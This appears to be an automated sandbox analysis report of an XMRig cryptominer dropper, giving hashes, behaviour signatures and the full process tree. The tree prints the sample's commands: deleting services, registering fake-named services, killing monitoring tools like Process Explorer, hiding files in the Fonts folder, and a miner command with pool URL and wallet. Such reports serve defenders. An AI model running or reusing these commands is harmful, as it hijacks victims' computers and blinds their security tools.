Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/05/2024, 15:02

General

  • Target

    67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe

  • Size

    1.5MB

  • MD5

    67aa4626a523e1eac3b90552be1cd4ad

  • SHA1

    9eb3bd7d1131a820a87b20a1631bc7b6bf9140c9

  • SHA256

    ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2

  • SHA512

    bfc6c4098a1c550ee41544b084eb0d2488577e656b5106a445a553a37a7a80e6b8a84be7f1467d3ca6c31046191f32c4feae31a56c5e16093b71fec7ea7d37de

  • SSDEEP

    24576:+c/nsodv5hQpu6q8K8MZLQJTkeOfAn/RZDtbQLf7u+YAgNdwuL8wmKiVME:/nHB5hYb4x2ftbQ2+owugwE9

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 6 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a C:\Windows\Fonts
        3⤵
        • Views/modifies file attributes
        PID:4864
    • C:\Windows\SysWOW64\net.exe
      net stop Microsarver
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3620
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop Microsarver
        3⤵
          PID:5112
      • C:\Windows\SysWOW64\sc.exe
        sc delete Microsarver
        2⤵
        • Launches sc.exe
        PID:3660
      • C:\Windows\SysWOW64\net.exe
        net stop Samsorver
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop Samsorver
          3⤵
            PID:1812
        • C:\Windows\SysWOW64\sc.exe
          sc delete Samsorver
          2⤵
          • Launches sc.exe
          PID:4128
        • C:\Windows\SysWOW64\net.exe
          net stop lanmanserver /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop lanmanserver /y
            3⤵
              PID:4516
          • C:\Windows\SysWOW64\sc.exe
            sc config lanmanserver start= DISABLED 2>nul
            2⤵
            • Launches sc.exe
            PID:3636
          • C:\Windows\SysWOW64\sc.exe
            sc delete lanmanserver
            2⤵
            • Launches sc.exe
            PID:1088
          • C:\Windows\SysWOW64\net.exe
            net stop mssecsvc2.0
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop mssecsvc2.0
              3⤵
                PID:4632
            • C:\Windows\SysWOW64\sc.exe
              sc delete mssecsvc2.0
              2⤵
              • Launches sc.exe
              PID:4080
            • C:\Windows\SysWOW64\net.exe
              net stop mssecsvc2.1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop mssecsvc2.1
                3⤵
                  PID:4460
              • C:\Windows\SysWOW64\sc.exe
                sc delete mssecsvc2.1
                2⤵
                • Launches sc.exe
                PID:3980
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe
                2⤵
                • Executes dropped EXE
                PID:4336
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service
                2⤵
                • Executes dropped EXE
                PID:4916
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.
                2⤵
                • Executes dropped EXE
                PID:2604
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe start Microsarver
                2⤵
                • Executes dropped EXE
                PID:4980
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
                2⤵
                • Deletes itself
                PID:4948
            • \??\c:\windows\Fonts\svchost.exe
              c:\windows\Fonts\svchost.exe
              1⤵
              • Executes dropped EXE
              PID:3420
              • \??\c:\windows\Fonts\conhost.exe
                "c:\windows\Fonts\conhost.exe"
                2⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4824
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
                  3⤵
                    PID:1984
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib -s -h -r -a C:\Windows\Fonts
                      4⤵
                      • Views/modifies file attributes
                      PID:740
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c attrib +s +a %SystemRoot%\Fonts
                    3⤵
                      PID:4176
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +s +a C:\Windows\Fonts
                        4⤵
                        • Drops file in Windows directory
                        • Views/modifies file attributes
                        PID:868
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c taskkill /im taskmgr.exe /f /T
                      3⤵
                        PID:4788
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im taskmgr.exe /f /T
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2808
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c taskkill /im rundll32.exe /f /T
                        3⤵
                          PID:3520
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im rundll32.exe /f /T
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:880
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c taskkill /im autoruns.exe /f /T
                          3⤵
                            PID:4976
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im autoruns.exe /f /T
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3516
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c taskkill /im perfmon.exe /f /T
                            3⤵
                              PID:2256
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im perfmon.exe /f /T
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2596
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c taskkill /im procexp.exe /f /T
                              3⤵
                                PID:3044
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im procexp.exe /f /T
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4416
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c taskkill /im ProcessHacker.exe /f /T
                                3⤵
                                  PID:2620
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im ProcessHacker.exe /f /T
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2712
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
                                  3⤵
                                    PID:2396
                                    • C:\Windows\SysWOW64\attrib.exe
                                      attrib -s -h -r -a C:\Windows\Fonts
                                      4⤵
                                      • Drops file in Windows directory
                                      PID:2916
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
                                    3⤵
                                    • Executes dropped EXE
                                    PID:1012
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4584
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
                                    3⤵
                                    • Executes dropped EXE
                                    PID:3620
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe start Samsorver
                                    3⤵
                                    • Executes dropped EXE
                                    PID:556
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                    3⤵
                                      PID:2740
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib +s +a C:\Windows\Fonts
                                        4⤵
                                        • Views/modifies file attributes
                                        PID:2608
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                      3⤵
                                        PID:760
                                        • C:\Windows\SysWOW64\attrib.exe
                                          attrib +s +a C:\Windows\Fonts
                                          4⤵
                                            PID:2008
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                          3⤵
                                            PID:4224
                                            • C:\Windows\SysWOW64\attrib.exe
                                              attrib +s +a C:\Windows\Fonts
                                              4⤵
                                              • Drops file in Windows directory
                                              PID:3504
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                            3⤵
                                              PID:3492
                                              • C:\Windows\SysWOW64\attrib.exe
                                                attrib +s +a C:\Windows\Fonts
                                                4⤵
                                                • Drops file in Windows directory
                                                • Views/modifies file attributes
                                                PID:1728
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                              3⤵
                                                PID:3716
                                                • C:\Windows\SysWOW64\attrib.exe
                                                  attrib +s +a C:\Windows\Fonts
                                                  4⤵
                                                  • Drops file in Windows directory
                                                  PID:404
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                3⤵
                                                  PID:2312
                                                  • C:\Windows\SysWOW64\attrib.exe
                                                    attrib +s +a C:\Windows\Fonts
                                                    4⤵
                                                    • Views/modifies file attributes
                                                    PID:1484
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                  3⤵
                                                    PID:1012
                                                    • C:\Windows\SysWOW64\attrib.exe
                                                      attrib +s +a C:\Windows\Fonts
                                                      4⤵
                                                      • Views/modifies file attributes
                                                      PID:4128
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                    3⤵
                                                      PID:4272
                                                      • C:\Windows\SysWOW64\attrib.exe
                                                        attrib +s +a C:\Windows\Fonts
                                                        4⤵
                                                        • Views/modifies file attributes
                                                        PID:3724
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                      3⤵
                                                        PID:2724
                                                        • C:\Windows\SysWOW64\attrib.exe
                                                          attrib +s +a C:\Windows\Fonts
                                                          4⤵
                                                          • Drops file in Windows directory
                                                          • Views/modifies file attributes
                                                          PID:3284
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                        3⤵
                                                          PID:2568
                                                          • C:\Windows\SysWOW64\attrib.exe
                                                            attrib +s +a C:\Windows\Fonts
                                                            4⤵
                                                            • Drops file in Windows directory
                                                            PID:3996
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                          3⤵
                                                            PID:4812
                                                            • C:\Windows\SysWOW64\attrib.exe
                                                              attrib +s +a C:\Windows\Fonts
                                                              4⤵
                                                                PID:440
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                              3⤵
                                                                PID:5088
                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                  attrib +s +a C:\Windows\Fonts
                                                                  4⤵
                                                                    PID:740
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                  3⤵
                                                                    PID:3868
                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                      attrib +s +a C:\Windows\Fonts
                                                                      4⤵
                                                                      • Views/modifies file attributes
                                                                      PID:4412
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                    3⤵
                                                                      PID:4556
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        attrib +s +a C:\Windows\Fonts
                                                                        4⤵
                                                                        • Drops file in Windows directory
                                                                        PID:2536
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                      3⤵
                                                                        PID:3652
                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                          attrib +s +a C:\Windows\Fonts
                                                                          4⤵
                                                                            PID:3168
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                          3⤵
                                                                            PID:4356
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              attrib +s +a C:\Windows\Fonts
                                                                              4⤵
                                                                                PID:4332
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                              3⤵
                                                                                PID:3784
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                  4⤵
                                                                                    PID:4600
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                  3⤵
                                                                                    PID:4940
                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                      4⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:3648
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                    3⤵
                                                                                      PID:3768
                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                        4⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:4972
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                      3⤵
                                                                                        PID:4496
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                          4⤵
                                                                                            PID:2396
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                          3⤵
                                                                                            PID:224
                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                              4⤵
                                                                                              • Drops file in Windows directory
                                                                                              PID:5112
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                            3⤵
                                                                                              PID:4888
                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                4⤵
                                                                                                  PID:2512
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                3⤵
                                                                                                  PID:1052
                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                    4⤵
                                                                                                      PID:4780
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                    3⤵
                                                                                                      PID:2180
                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                        4⤵
                                                                                                          PID:5008
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                        3⤵
                                                                                                          PID:3720
                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                            4⤵
                                                                                                            • Views/modifies file attributes
                                                                                                            PID:4224
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                          3⤵
                                                                                                            PID:2944
                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                              4⤵
                                                                                                                PID:4412
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                              3⤵
                                                                                                                PID:4712
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                  4⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:4956
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                3⤵
                                                                                                                  PID:1172
                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                    4⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:3492
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                  3⤵
                                                                                                                    PID:3444
                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                      4⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:3304
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                    3⤵
                                                                                                                      PID:2392
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2620
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                      3⤵
                                                                                                                        PID:2264
                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                          4⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:4464
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                        3⤵
                                                                                                                          PID:3476
                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                            4⤵
                                                                                                                              PID:1204
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                            3⤵
                                                                                                                              PID:4128
                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                4⤵
                                                                                                                                  PID:3532
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                3⤵
                                                                                                                                  PID:2452
                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                    4⤵
                                                                                                                                    • Views/modifies file attributes
                                                                                                                                    PID:4536
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                  3⤵
                                                                                                                                    PID:868
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                      4⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:1312
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                    3⤵
                                                                                                                                      PID:2724
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                        4⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:2880
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                      3⤵
                                                                                                                                        PID:4816
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                          4⤵
                                                                                                                                            PID:5088
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                          3⤵
                                                                                                                                            PID:384
                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                              4⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:1476
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                            3⤵
                                                                                                                                              PID:3064
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                4⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:1928
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                              3⤵
                                                                                                                                                PID:2476
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                  4⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:3792
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                3⤵
                                                                                                                                                  PID:3492
                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                    4⤵
                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                    PID:760
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3396
                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                      4⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      PID:880
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3612
                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                        4⤵
                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                        PID:2620
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2260
                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                          4⤵
                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                          PID:4348
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3024
                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                            4⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            PID:3148
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1204
                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                              4⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:4508
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4336
                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                4⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                PID:1012
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3592
                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                  PID:3724
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4272
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    PID:5100
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4232
                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                      PID:2896
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4980
                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4388
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5064
                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                            PID:3320
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2128
                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                              PID:1096
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2212
                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:468
